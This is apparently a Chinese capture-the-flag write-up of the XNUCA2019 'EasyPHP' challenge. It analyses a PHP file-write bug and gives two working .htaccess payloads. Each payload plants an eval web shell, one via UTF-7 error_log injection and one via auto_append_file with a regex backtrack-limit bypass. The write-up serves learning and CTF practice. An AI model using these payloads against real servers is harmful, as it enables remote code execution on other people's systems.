[XNUCA2019Qualifier]EasyPHP

ps:有三个解,这里写了两种,学到了很多。

[XNUCA2019Qualifier]EasyPHP

 <?php
    $files = scandir(‘./‘); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    include_once("fl3g.php");
    if(!isset($_GET[‘content‘]) || !isset($_GET[‘filename‘])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET[‘content‘];
    if(stristr($content,‘on‘) || stristr($content,‘html‘) || stristr($content,‘type‘) || stristr($content,‘flag‘) || stristr($content,‘upload‘) || stristr($content,‘file‘)) {
        echo "Hacker";
        die();
    }
    $filename = $_GET[‘filename‘];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir(‘./‘); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nJust one chance");
?> 

分析这一段php代码:

在这一段php中,他讲所有的除index.php以外的文件全部删除断开。

同时包含fl3g,flag就在里面。

对于传入的content,进行了检查,存在防火墙。

同时文件名只能为英文字母和数字符号.

最后存在一个输出的函数,fileputcontent,将我们的文件都进行了输出。

在这里我们是能够上传.htaccess文件,但是在htaccess文件写入的时候,写入了一些混加的字符来打乱了我们的配置,可以利用注释符,以及转义,来进行绕过即#\,拼接完成过后就变成了#\\nJust one chance 不存在换行了。

这样我们的.htaccess文件就生效了。

那么接下来在htaccess文件当中,在指定目录写指定文件名。

这个时候就利用htaccess文件对php.ini进行配置:

php_value include_path "/tmp/xx/+ADw?php die(eval($_GET[2]))+ADs +AF8AXw-halt+AF8-compiler()+ADs"
php_value error_reporting 32767
php_value error_log /tmp/fl3g.php
# 

通过error_log将php运行报错的记录写到指定文件中。
这里写到/tmp/fl3g.php文件下
php_value error_reporting 32767中32767是所有常量加起来的值。

关于触发报错:将include_path的内容设置成payload的内容,此时访问页面,页面尝试将payload作为一个路径去访问时就会因为找不到fl3g.php而报错。

此时我们访问index.php就会触发error,将shell写入/tmp/fl3g.php中。

接着写下新的配置:

php_value include_path "/tmp"
php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
# \  

将编码设置转为UTF-7,这样shell就能够被顺利的解析出来了。

同时利用include_path将我们刚刚生成的文件给包含出来,这样的话,shell就能够被解析了。

include_path的作用就是设置用include()函数包函文件时的路径,此时包含的就是/tmp/fl3g

接下来,就可以执行命令了。

解法二

php_value pcre.backtrack_limit    0
php_value auto_append_file    ".htaccess"
php_value pcre.jit   0
#aa<?php eval($_GET[‘a‘]);?>\  

因为判断条件为:if(preg_match("/[^a-z\.]/", $filename) == 1)

因此通过php_value 设置正则回朔次数来使正则匹配的结果返回为false而不是0或1,默认的回朔次数比较大,可以设成0,那么当超过此次数以后将返回false,这个p神是有说过的,正则表达式的两种机制。

auto_append_file =
; 指定在主文件之后自动解析的文件名。
; 该文件就像调用了include()函数一样被包含进来,因此会使用"include_path"
; 注: 如果脚本通过 exit() 终止,则自动后缀不会发生。

一旦正则表达式被绕过,那么前面的if(stristr($content,‘on‘) || stristr($content,‘html‘) || stristr($content,‘type‘) || stristr($content,‘flag‘) || stristr($content,‘upload‘) || stristr($content,‘file‘))就能使用php://filiter进行绕过了。

[XNUCA2019Qualifier]EasyPHP

上一篇:HTTP–Response详解


下一篇:nodejs基础(1)